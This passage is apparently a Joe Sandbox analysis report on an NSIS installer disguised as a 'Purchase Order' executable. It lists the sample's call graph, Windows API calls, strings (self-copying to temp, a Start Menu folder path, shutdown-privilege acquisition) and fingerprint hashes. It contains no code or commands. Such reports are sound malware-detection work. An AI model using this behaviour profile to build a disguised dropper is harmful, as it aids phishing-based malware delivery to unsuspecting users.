5201->5204 5202->5198 5207 404629 5202->5207 5228 404253 EnableWindow 5203->5228 5209 404231 18 API calls 5204->5209 5210 404651 5205->5210 5206->5202 5211 4045d6 SendMessageW LoadCursorW SetCursor 5206->5211 5212 40463f 5207->5212 5213 40462f SendMessageW 5207->5213 5215 40447c CheckDlgButton 5209->5215 5232 40469f 5211->5232 5212->5210 5217 404645 SendMessageW 5212->5217 5213->5212 5214 404587 5229 40467b 5214->5229 5226 404253 EnableWindow 5215->5226 5217->5210 5221 40449a GetDlgItem 5227 404266 SendMessageW 5221->5227 5223 4044b0 SendMessageW 5224 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5223->5224 5225 4044cd GetSysColor 5223->5225 5224->5210 5225->5224 5226->5221 5227->5223 5228->5214 5230 404689 5229->5230 5231 40468e SendMessageW 5229->5231 5230->5231 5231->5197 5235 4058e6 ShellExecuteExW 5232->5235 5234 404605 LoadCursorW SetCursor 5234->5202 5235->5234 5236 401a72 5237 402c1f 17 API calls 5236->5237 5238 401a7b 5237->5238 5239 402c1f 17 API calls 5238->5239 5240 401a20 5239->5240 5241 401cf3 5242 402c1f 17 API calls 5241->5242 5243 401cf9 IsWindow 5242->5243 5244 401a20 5243->5244 5245 401573 5246 401583 ShowWindow 5245->5246 5247 40158c 5245->5247 5246->5247 5248 402ac5 5247->5248 5249 40159a ShowWindow 5247->5249 5249->5248 5250 402df3 5251 402e05 SetTimer 5250->5251 5253 402e1e 5250->5253 5251->5253 5252 402e73 5253->5252 5254 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5253->5254 5254->5252 5255 4014f5 SetForegroundWindow 5256 402ac5 5255->5256 5257 402576 5258 402c41 17 API calls 5257->5258 5259 40257d 5258->5259 5262 405db0 GetFileAttributesW CreateFileW 5259->5262 5261 402589 5262->5261 5263 401b77 5264 401b84 5263->5264 5265 401bc8 5263->5265 5266 401c0d 5264->5266 5271 401b9b 5264->5271 5267 401bf2 GlobalAlloc 5265->5267 5268 401bcd 5265->5268 5269 4062dc 17 API calls 5266->5269 5278 4022f7 5266->5278 5270 4062dc 17 API calls 5267->5270 5268->5278 5284 4062ba lstrcpynW 5268->5284 5273 4022f1 5269->5273 
5270->5266 5282 4062ba lstrcpynW 5271->5282 5276 405920 MessageBoxIndirectW 5273->5276 5275 401bdf GlobalFree 5275->5278 5276->5278 5277 401baa 5283 4062ba lstrcpynW 5277->5283 5280 401bb9 5285 4062ba lstrcpynW 5280->5285 5282->5277 5283->5280 5284->5275 5285->5278 5286 404a78 5287 404aa4 5286->5287 5288 404a88 5286->5288 5290 404ad7 5287->5290 5291 404aaa SHGetPathFromIDListW 5287->5291 5297 405904 GetDlgItemTextW 5288->5297 5293 404ac1 SendMessageW 5291->5293 5294 404aba 5291->5294 5292 404a95 SendMessageW 5292->5287 5293->5290 5295 40140b 2 API calls 5294->5295 5295->5293 5297->5292 5298 4024f8 5299 402c81 17 API calls 5298->5299 5300 402502 5299->5300 5301 402c1f 17 API calls 5300->5301 5302 40250b 5301->5302 5303 402533 RegEnumValueW 5302->5303 5304 402527 RegEnumKeyW 5302->5304 5306 40288b 5302->5306 5305 402548 RegCloseKey 5303->5305 5304->5305 5305->5306 5308 40167b 5309 402c41 17 API calls 5308->5309 5310 401682 5309->5310 5311 402c41 17 API calls 5310->5311 5312 40168b 5311->5312 5313 402c41 17 API calls 5312->5313 5314 401694 MoveFileW 5313->5314 5315 4016a7 5314->5315 5321 4016a0 5314->5321 5316 4065fd 2 API calls 5315->5316 5319 402250 5315->5319 5318 4016b6 5316->5318 5317 401423 24 API calls 5317->5319 5318->5319 5320 406080 36 API calls 5318->5320 5320->5321 5321->5317 5322 401e7d 5323 402c41 17 API calls 5322->5323 5324 401e83 5323->5324 5325 402c41 17 API calls 5324->5325 5326 401e8c 5325->5326 5327 402c41 17 API calls 5326->5327 5328 401e95 5327->5328 5329 402c41 17 API calls 5328->5329 5330 401e9e 5329->5330 5331 401423 24 API calls 5330->5331 5332 401ea5 5331->5332 5339 4058e6 ShellExecuteExW 5332->5339 5334 401ee7 5335 406745 5 API calls 5334->5335 5336 40288b 5334->5336 5337 401f01 CloseHandle 5335->5337 5337->5336 5339->5334 5340 73cf1671 5341 73cf1516 GlobalFree 5340->5341 5342 73cf1689 5341->5342 5343 73cf16cf GlobalFree 5342->5343 5344 73cf16a4 5342->5344 5345 73cf16bb VirtualFree 5342->5345 5344->5343 5345->5343 5346 4019ff 5347 402c41 
17 API calls 5346->5347 5348 401a06 5347->5348 5349 402c41 17 API calls 5348->5349 5350 401a0f 5349->5350 5351 401a16 lstrcmpiW 5350->5351 5352 401a28 lstrcmpW 5350->5352 5353 401a1c 5351->5353 5352->5353 5354 401000 5355 401037 BeginPaint GetClientRect 5354->5355 5356 40100c DefWindowProcW 5354->5356 5358 4010f3 5355->5358 5359 401179 5356->5359 5360 401073 CreateBrushIndirect FillRect DeleteObject 5358->5360 5361 4010fc 5358->5361 5360->5358 5362 401102 CreateFontIndirectW 5361->5362 5363 401167 EndPaint 5361->5363 5362->5363 5364 401112 6 API calls 5362->5364 5363->5359 5364->5363 5365 401503 5366 40150b 5365->5366 5368 40151e 5365->5368 5367 402c1f 17 API calls 5366->5367 5367->5368 4148 402104 4149 402c41 17 API calls 4148->4149 4150 40210b 4149->4150 4151 402c41 17 API calls 4150->4151 4152 402115 4151->4152 4153 402c41 17 API calls 4152->4153 4154 40211f 4153->4154 4155 402c41 17 API calls 4154->4155 4156 402129 4155->4156 4157 402c41 17 API calls 4156->4157 4159 402133 4157->4159 4158 402172 CoCreateInstance 4163 402191 4158->4163 4159->4158 4160 402c41 17 API calls 4159->4160 4160->4158 4161 401423 24 API calls 4162 402250 4161->4162 4163->4161 4163->4162 4164 402484 4175 402c81 4164->4175 4167 402c41 17 API calls 4168 402497 4167->4168 4169 4024a2 RegQueryValueExW 4168->4169 4172 40288b 4168->4172 4170 4024c8 RegCloseKey 4169->4170 4171 4024c2 4169->4171 4170->4172 4171->4170 4180 406201 wsprintfW 4171->4180 4176 402c41 17 API calls 4175->4176 4177 402c98 4176->4177 4178 406127 RegOpenKeyExW 4177->4178 4179 40248e 4178->4179 4179->4167 4180->4170 4182 401f06 4183 402c41 17 API calls 4182->4183 4184 401f0c 4183->4184 4185 405322 24 API calls 4184->4185 4186 401f16 4185->4186 4197 4058a3 CreateProcessW 4186->4197 4189 401f3f CloseHandle 4193 40288b 4189->4193 4192 401f31 4194 401f41 4192->4194 4195 401f36 4192->4195 4194->4189 4205 406201 wsprintfW 4195->4205 4198 401f1c 4197->4198 4199 4058d6 CloseHandle 4197->4199 4198->4189 4198->4193 4200 406745 
WaitForSingleObject 4198->4200 4199->4198 4201 40675f 4200->4201 4202 406771 GetExitCodeProcess 4201->4202 4206 4066d0 4201->4206 4202->4192 4205->4189 4207 4066ed PeekMessageW 4206->4207 4208 4066e3 DispatchMessageW 4207->4208 4209 4066fd WaitForSingleObject 4207->4209 4208->4207 4209->4201 4242 40230c 4243 402314 4242->4243 4244 40231a 4242->4244 4245 402c41 17 API calls 4243->4245 4246 402328 4244->4246 4247 402c41 17 API calls 4244->4247 4245->4244 4248 402c41 17 API calls 4246->4248 4250 402336 4246->4250 4247->4246 4248->4250 4249 402c41 17 API calls 4251 40233f WritePrivateProfileStringW 4249->4251 4250->4249 5369 40190c 5370 401943 5369->5370 5371 402c41 17 API calls 5370->5371 5372 401948 5371->5372 5373 4059cc 67 API calls 5372->5373 5374 401951 5373->5374 5375 401f8c 5376 402c41 17 API calls 5375->5376 5377 401f93 5376->5377 5378 406694 5 API calls 5377->5378 5379 401fa2 5378->5379 5380 402026 5379->5380 5381 401fbe GlobalAlloc 5379->5381 5381->5380 5382 401fd2 5381->5382 5383 406694 5 API calls 5382->5383 5384 401fd9 5383->5384 5385 406694 5 API calls 5384->5385 5386 401fe3 5385->5386 5386->5380 5390 406201 wsprintfW 5386->5390 5388 402018 5391 406201 wsprintfW 5388->5391 5390->5388 5391->5380 5392 73cf2301 5393 73cf236b 5392->5393 5394 73cf2376 GlobalAlloc 5393->5394 5395 73cf2395 5393->5395 5394->5393 5396 40238e 5397 4023c1 5396->5397 5398 402396 5396->5398 5400 402c41 17 API calls 5397->5400 5399 402c81 17 API calls 5398->5399 5401 40239d 5399->5401 5402 4023c8 5400->5402 5404 402c41 17 API calls 5401->5404 5405 4023d5 5401->5405 5407 402cff 5402->5407 5406 4023ae RegDeleteValueW RegCloseKey 5404->5406 5406->5405 5408 402d13 5407->5408 5409 402d0c 5407->5409 5408->5409 5411 402d44 5408->5411 5409->5405 5412 406127 RegOpenKeyExW 5411->5412 5417 402d72 5412->5417 5413 402d98 RegEnumKeyW 5414 402daf RegCloseKey 5413->5414 5413->5417 5415 406694 5 API calls 5414->5415 5418 402dbf 5415->5418 5416 402dd0 RegCloseKey 5421 402dc3 5416->5421 5417->5413 
5417->5414 5417->5416 5419 402d44 6 API calls 5417->5419 5417->5421 5420 402de0 RegDeleteKeyW 5418->5420 5418->5421 5419->5417 5420->5421 5421->5409 4314 40338f SetErrorMode GetVersion 4315 4033ce 4314->4315 4316 4033d4 4314->4316 4317 406694 5 API calls 4315->4317 4318 406624 3 API calls 4316->4318 4317->4316 4319 4033ea lstrlenA 4318->4319 4319->4316 4320 4033fa 4319->4320 4321 406694 5 API calls 4320->4321 4322 403401 4321->4322 4323 406694 5 API calls 4322->4323 4324 403408 4323->4324 4325 406694 5 API calls 4324->4325 4326 403414 #17 OleInitialize SHGetFileInfoW 4325->4326 4404 4062ba lstrcpynW 4326->4404 4329 403460 GetCommandLineW 4405 4062ba lstrcpynW 4329->4405 4331 403472 4332 405bbc CharNextW 4331->4332 4333 403497 CharNextW 4332->4333 4334 4035c1 GetTempPathW 4333->4334 4344 4034b0 4333->4344 4406 40335e 4334->4406 4336 4035d9 4337 403633 DeleteFileW 4336->4337 4338 4035dd GetWindowsDirectoryW lstrcatW 4336->4338 4416 402edd GetTickCount GetModuleFileNameW 4337->4416 4341 40335e 12 API calls 4338->4341 4339 405bbc CharNextW 4339->4344 4343 4035f9 4341->4343 4342 403647 4352 405bbc CharNextW 4342->4352 4386 4036ea 4342->4386 4399 4036fa 4342->4399 4343->4337 4345 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4343->4345 4344->4339 4346 4035ac 4344->4346 4348 4035aa 4344->4348 4347 40335e 12 API calls 4345->4347 4500 4062ba lstrcpynW 4346->4500 4350 40362b 4347->4350 4348->4334 4350->4337 4350->4399 4361 403666 4352->4361 4355 403834 4357 40383c GetCurrentProcess OpenProcessToken 4355->4357 4362 4038b8 ExitProcess 4355->4362 4356 403714 4358 405920 MessageBoxIndirectW 4356->4358 4359 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4357->4359 4360 403888 4357->4360 4366 403722 ExitProcess 4358->4366 4359->4360 4369 406694 5 API calls 4360->4369 4364 4036c4 4361->4364 4365 40372a 4361->4365 4367 405c97 18 API calls 4364->4367 4368 40588b 5 API calls 4365->4368 4370 4036d0 4367->4370 4371 40372f lstrcatW 4368->4371 4372 

                                            Control-flow Graph

                                            [Figure: control-flow graph beginning at block 40338f; nodes marked as executed or not executed. Graph not reproduced.]
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 004033B2
                                            • GetVersion.KERNEL32 ref: 004033B8
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                            • #17.COMCTL32(?,00000006,?,0000000A), ref: 00403428
                                            • OleInitialize.OLE32(00000000), ref: 0040342F
                                            • SHGetFileInfoW.SHELL32(0042B208,00000000,?,?,00000000), ref: 0040344B
                                            • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 00403460
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,?,00000006,?,0000000A), ref: 00403498
                                              • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                            • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035D2
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035E3
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035EF
                                            • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403603
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040360B
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040361C
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403624
                                            • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 00403638
                                              • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                            • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403703
                                            • ExitProcess.KERNEL32 ref: 00403724
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403737
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403746
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403751
                                            • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040375D
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403779
                                            • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?,?,00000006,?,0000000A), ref: 004037D3
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,0042AA08,00000001,?,00000006,?,0000000A), ref: 004037E7
                                            • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,?,0000000A), ref: 00403814
                                            • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403843
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                            • ExitProcess.KERNEL32 ref: 004038CA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 3441113951-356164803
                                            • Opcode ID: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                            • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                            • Opcode Fuzzy Hash: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                            • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                            Control-flow Graph

                                            [Figure: control-flow graph beginning at block 404c9e; nodes marked as executed or not executed. Graph not reproduced.]
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                            • GetDlgItem.USER32(?,?), ref: 00404CC1
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404D0B
                                            • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                            • SetWindowLongW.USER32(?,?,00405296), ref: 00404D37
                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404D4B
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                            • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D91
                                            • DeleteObject.GDI32(00000000), ref: 00404D94
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                            • GetWindowLongW.USER32(?,?), ref: 00404ECF
                                            • SetWindowLongW.USER32(?,?,00000000), ref: 00404EDD
                                            • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405065
                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00405089
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                            • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                            • GlobalFree.KERNEL32(?), ref: 004050CE
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                            • ShowWindow.USER32(?,00000000), ref: 0040526D
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                            • ShowWindow.USER32(00000000), ref: 0040527F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                            • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                            • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                            • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58

                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059F5
                                            • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A3D
                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A60
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A66
                                            • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A76
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                            • FindClose.KERNEL32(00000000), ref: 00405B25
                                            Strings
                                            • \*.*, xrefs: 00405A37
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 004059CC
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059DA
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-3880770136
                                            • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                            • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                            • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                            • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E

                                            APIs
                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                            • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                              • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                            Strings
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                            • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                            • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                            • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                            APIs
                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 004021C3
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                            • API String ID: 542301482-2950068324
                                            • Opcode ID: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                            • Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
                                            • Opcode Fuzzy Hash: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                            • Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 00406608
                                            • FindClose.KERNEL32(00000000), ref: 00406614
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                            • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                            • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                            • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                            • ShowWindow.USER32(?), ref: 00403DB1
                                            • DestroyWindow.USER32 ref: 00403DC5
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                            • GetDlgItem.USER32(?,?), ref: 00403E02
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                            • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                            • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                            • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                            • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                            • ShowWindow.USER32(00000000,?), ref: 00404007
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                            • EnableWindow.USER32(?,?), ref: 00404034
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                            • EnableMenuItem.USER32(00000000), ref: 00404051
                                            • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404069
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                            • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                            • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                            • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 3282139019-0
                                            • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                            • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                            • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
